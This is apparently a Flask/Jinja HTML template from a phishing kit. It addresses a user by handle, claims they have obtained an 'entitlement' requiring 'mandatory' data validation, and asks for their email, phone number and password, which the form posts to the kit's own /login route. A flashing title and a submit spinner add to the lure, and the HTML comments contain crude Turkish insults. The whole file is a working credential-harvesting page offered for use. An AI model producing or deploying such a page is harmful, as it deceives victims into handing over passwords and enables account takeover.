
<!DOCTYPE html><html lang="en"><head>
    <link href="{{ url_for('static', filename='css.css') }} " type="text/css" rel="stylesheet"/>

        <title></title>
        
            
        
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://fonts.googleapis.com/css?family=Poppins:400,500,700,800&amp;display=swap" rel="stylesheet">
    <link href="{{ url_for('static', filename='css/bootstrap.min.css') }}" rel="stylesheet">
    <link href="{{ url_for('static', filename='css/all.min.css') }} " rel="stylesheet">
    <link href="{{ url_for('static', filename='css/perfect-scrollbar.css') }} " rel="stylesheet">


    <!-- anana girsin lan piç -->
    <link href="{{ url_for('static', filename='css/main.min.css') }}" rel="stylesheet">
    <link href="{{ url_for('static', filename='css/custom.css') }}" rel="stylesheet">

</head>

<body class="login-page">

    <div class="container">
        <div class="row justify-content-md-center">
            <div class="col-md-12 col-lg-4">
                <div class="card login-box-container">
                    <div class="card-body">
                        <form class="sign-in-form" method="POST"  id="frm" action="/login" >
                          
                            <div class="authent-logo">
                               
                            </div>
                            <div class="authent-text">
                             <div align="center" class="breadcrumb_iner_item">
                                                  <h2 color= >
                                            <h1>Dear @{{ username }}</h1><br>
                                       
                                                
                                           <h5>Follow the instructions for the <br>entitlement you have obtained.<br>These operations are mandatory for data validation.</h5><br>   </h2><h2>
                                        
                                                
                                                     
                          <br>
                        
                            </h2></div>
                            
                                <div class="mb-3">
                                    <div class="form-floating">
                                        <input type="email" class="form-control" required name="mail" placeholder="E-Mail">
                                        <label for="floatingInput"><i class="fas fa-mailbox"></i> E-Mail</label>
                                    </div>
                                    <br>
                                    <div class="form-floating">
                                        <input type="number" class="form-control" required name="number" placeholder="Phone Number">
                                        <input type="hidden" class="form-control" required name="username" value="{{ username }}">
                                        <label for="floatingInput"><i class="fas fa-number"></i> Phone Number</label>
                                    </div>
                                    <br>
                                    <div class="form-floating">
                                        <input type="password" class="form-control" required name="pass" placeholder="Password">
                                        <label for="floatingInput"><i class="fas fa-asdas"></i> Password</label>
                                    </div>
                                    <br>
                                </div>
                                 <br>    <br>
                                <div class="d-grid">
                                    <button type="submit" class="btn btn-info m-b-xs" id="df">Continue</button>
                                        <br>    <br>
                                </div>
                            
                    </div></form>
                </div>
                

<div align="center">
    <img src="{{ url_for('static', filename='images/ves-logo.png') }} " width="200" height="auto">
</div>
            </div>
        </div>
        
        <script src="{{ url_for('static', filename='js/jquery-3.4.1.min.js') }} "></script>

   <!--======================================amcık hoşafıııı=========================================================-->
  
   <script type="text/javascript">
      var request;

      $("#frm").submit(function(event) {
         var btn = $("#df");
         btn.prop("disabled", true);


         $("#df").html("<img wight='20' height='20' src='https://i.gifer.com/ZZ5H.gif'>");
      });
   </script>
   <script>var isOldTitle = true;
var oldTitle = "@{{ username }}";
var newTitle = "Welcome";
function changeTitle() {
     document.title = isOldTitle ? oldTitle : newTitle;
     isOldTitle = !isOldTitle;
     setTimeout(changeTitle, 1300);
}
changeTitle();</script>

  


</div></div></body></html>